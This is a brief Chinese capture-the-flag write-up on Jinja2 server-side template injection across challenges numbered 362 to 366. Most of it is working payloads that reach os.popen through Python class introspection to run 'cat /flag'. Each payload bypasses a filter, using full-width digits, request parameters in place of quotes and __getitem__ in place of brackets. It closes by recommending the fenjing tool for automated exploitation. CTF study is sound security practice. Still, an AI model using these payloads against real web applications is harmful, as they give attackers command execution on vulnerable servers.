SSIT362-370

362：
过滤了数字，使用全角绕过

?name={{"".__class__.__bases__[0].__subclasses__()[１３２].__init__.__globals__['popen']('cat /flag').read()}}

363：
过滤了单双引号
使用自定义变量
把'popen'换成request.args.a 'cat /flag'换成request.args.b
注意把双引号换成中括号

?name={{[].__class__.__bases__[0].__subclasses__()[１３２].__init__.__globals__[request.args.a](request.args.b).read()}}&a=popen&b=cat /flag

364:
过滤了args，换成values

?name={{[].__class__.__bases__[0].__subclasses__()[１３２].__init__.__globals__[request.values.a](request.values.b).read()}}&a=popen&b=cat /flag

365：
过滤了[]
用getitem魔术方法绕过
基本操作：
bases[0]=bases.getitem(0)

?name={{a.__class__.__bases__.__getitem__(0).__subclasses__().__getitem__(132).__init__.__globals__.__getitem__(request.values.a)(request.values.b).read()}}&a=popen&b=cat /flag

366：
过滤了下划线

最近参加比赛发现了一个工具：fenjing
可以直接梭哈大部分ssit，建议学习过基础ssit和过滤后使用
后面就不写了，可以用fenjing梭哈